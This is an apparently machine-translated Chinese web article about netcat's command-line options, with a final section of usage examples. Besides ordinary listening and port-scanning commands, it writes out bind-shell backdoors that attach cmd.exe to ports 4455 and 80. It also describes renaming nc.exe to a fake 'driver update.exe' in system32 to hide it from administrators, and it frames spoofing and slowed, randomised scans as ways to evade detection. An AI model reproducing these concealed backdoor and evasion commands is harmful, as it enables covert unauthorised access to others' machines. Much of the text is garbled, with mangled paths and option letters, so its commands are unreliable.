1. 首页 >IT资讯 > 正文

netcat windows(netcat)

导读 大家好,小小来为大家解答以下问题,netcat windows,netcat很多朋友还不知道,现在让我们一起来看看吧!1、nc的全称是NetCat,它可以建立

大家好,小小来为大家解答以下问题,netcat windows,netcat很多朋友还不知道,现在让我们一起来看看吧!

1、 nc的全称是NetCat,它可以建立和接受传输控制协议(TCP)和用户数据报协议(UDP)之间的连接,Netcat可以在这些连接上读写数据,直到连接关闭。它可以手动或通过脚本与网络应用程序或应用层的服务进行交互。从技术上讲,NetCat不能生成UDP连接,因为UDP是无连接协议。NetCat没有图形界面,比较粗糙原始。

2、 nc的命令行

3、 nc的基本命令行形式是nc [options] host ports,其中host是要扫描的主机名或IP地址,ports可以是单个端口、端口范围(以m-n的形式指定)或一系列由空格分隔的单个端口。

4、 -d只对Windows操作系统有用。该选项使NetCat工作在stealth模式,从而在MS-DOS命令提示符下运行出环境,这样nc就可以在不保持命令窗口打开的情况下运行在监控模式下,还可以帮助黑客隐藏和监控NetCat实例而不被系统管理员发现。

5、 -e如果NetCat使用gaping _ security _ hole选项进行编译,只要有人在网络后台监听的任何端口上建立连接,NetCat就会执行,并且客户端的NetCat会将I/O通过管道传输到正在别处监听的另一个NetCat实例。使用这个选项是非常危险的,除非你很了解nc,至少你知道自己在做什么。这是在系统中构建后门外壳的一种非常快速简单的方法。

6、 -i延迟间隔,表示nc在两次数据传输之间等待的时间。例如,当通过管道向nc传输文件时,nc在传输下一个输入行之前等待的秒数。当使用nc在主机的多个端口之间操作时,nc在切换到下一个端口之前等待的秒数。这可以使黑客在传输数据或攻击服务时更加隐蔽,也有助于您的端口扫描不被入侵检测系统和系统管理员发现。

7、 -g选项具有欺骗性。Nc支持松散的源路由。您可以在命令行上指定最多8 -g选项,以强制nc流量通过特定的IP地址。当您为流量设置伪造的源IP地址时,您可以使用此方法通过防火墙过滤或允许访问主机列表,希望收到主机的响应。

8、 -g该选项允许用户使用由-G选项指定的路由列表中指定的地址作为当前的下一条路由。由于IP地址的大小为4字节(IPV4),因此该参数始终是4字节的倍数;例如,4代表路由表中的第一个IP地址,8代表第二个IP地址,依此类推。通过伪造源路由表的一部分,这使得消息看起来非常有用。作弊路由的时候,这个功能有助于屏蔽你的位置,但是你可能收不到响应消息,因为响应消息会通过伪造的IP地址路由回来。

9、 -l该选项切换nc的监控模式。该选项必须与-p选项一起使用,以告诉nc绑定到指定的TCP端口并等待传入的连接。如果切换到-u选项,应该使用UDP端口而不是TCP端口。

10、 -L此选项在Windows版本中很有用。当连接关闭时,使用相同的命令行选项重新启动监听模式。即使初始连接已经结束,nc也可以在没有用户干预的情况下接收新连接。和-l一样,必须和-p一起使用。

11、 -n这个选项告诉我们nc不做任何主机名查找。

12、 -0对数据执行十六进制转储,并将其存储在hexfile中。命令nc-o hexfile会记录双向通信的数据,每行开头会有一个'或'分别表示是传入数据还是传出数据。如果只想获得传入数据的十六进制转储,可以使用nc -ohexfile命令。

13、 -p让用户指定nc应该使用的本地端口号。当使用带有-l或-L选项的监听模式时,此参数是必需的。如果没有为传出连接指定该参数,nc将使用系统分配给它的任何端口,就像大多数其他TCP或UDP客户端一样。

14、 -r该参数使nc能够随机选择本地和远程端口。当使用nc获取系统中大量端口的信息时,如果混合源端口和目的端口的顺序看起来不像端口扫描,则此选项非常有用。当此选项与-i选项和足够大的时间间隔结合使用时,成功扫描未被注意的端口的机会可以大大提高。

15、 -s指定nc在建立连接时使用的IP地址。这个选项允许黑客做一些工作。它允许黑客隐藏他们的IP地址或假冒他人的IP地址,但要获得任何有关路由到他们欺骗的地址的信息,他们需要使用-g source路由选项。其次,在监听模式下,大多数情况下可以和一个已经监听的服务“预绑定”,所有的TCP和UDP服务都绑定到某个端口。

16、 -t如果使用telnet选项进行编译,nc可以与telnet服务器协商telnet选项。虽然它的响应是无意义的信息,但是你可以通过这个状态看到连接端口23的信息。

17、 -u nc使用UDP而不是TCP,它在客户端模式和监听模式下都有效。

18、 -v控制nc将做什么的程度。比如用nc -v,nc只会把收到的数据吐出来。单个v可以知道它所连接或绑定的地址是否有问题,第二个v可以让nc知道它在连接结束时发送和接收了多少数据。

19、 -w控制nc放弃连接之前等待的时间。同时,它还告诉nc在接收到标准输入上的eof(文件结束)后,应该等待多长时间来关闭连接并退出。如果您通过nc向远程服务器发送命令,并希望返回大量数据(例如,向web服务器发送http命令以下载一个大文件),则此选项非常有用。

20、 数控的具体使用

21、 C: NC。cmd.exe可以很好地隐藏一个NetCat后门。

22、 C: NC。exe-p 4455-D-L-E cmd.exe这个命令允许黑客使用NetCat返回系统,直到系统管理员看到nc.exe在任务管理器中运行,从而找到这个后门。我们也可以让它更隐蔽。

23、 c:移动nc.exe c:windows system 32 driver update . exe

24、 c:windows系统32 driver update . exe-p 4455-d-L-e cmd.exe

25、 系统管理员可能会给一些无害的程序附加特权,如update.exe,黑客也可以隐藏命令行。

26、 c:windowssystme 32 driver update . exe

27、 cmd线:-L-p 4455-d-L-e cmd.exe

28、 丙:

29、 Nc -l-p 80监听端口80

30、 Nc -l -p 80 c:log.dat监听端口80,并将信息记录在log.dat中。

31、 Nc -v -l -p 80监听端口80并显示端口信息。

32、 Nc -vv -l -p 80监听端口80,并显示更详细的端口信息。

33、 NC-L-P 80-T-E cmd.exe监控本地端口80的入站信息,同时将cmd.exe重定向到端口80。当有人连接时,让cmd.exe以telnet的形式回复。当然,这个最好用在控制肉鸡上。

34、 Nc -v ip端口扫描ip的一个端口。

35、 Nc -v -z ip port-port扫描ip端口到端口。

36、 Nc -v -z -u ip port-port将ip的UDP端口扫描到UDP端口。

今天本文讲解到此结束,希望对你有所帮助。

标签:

免责声明:本文由用户上传,如有侵权请联系删除!